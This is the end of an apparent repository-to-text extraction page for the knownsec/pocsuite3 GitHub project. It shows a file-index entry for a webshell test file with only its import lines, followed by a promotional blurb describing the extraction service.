"path": "tests/test_webshell.py",
"chars": 1178,
"preview": "import unittest\nimport os\nfrom pocsuite3.api import WebShell\nfrom pocsuite3.lib.core.data import paths\nfrom pocsuite3.li"
}
]
About this extraction
This page contains the full source code of the knownsec/pocsuite3 GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 164 files (725.2 KB), approximately 199.9k tokens, and a symbol index with 1122 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.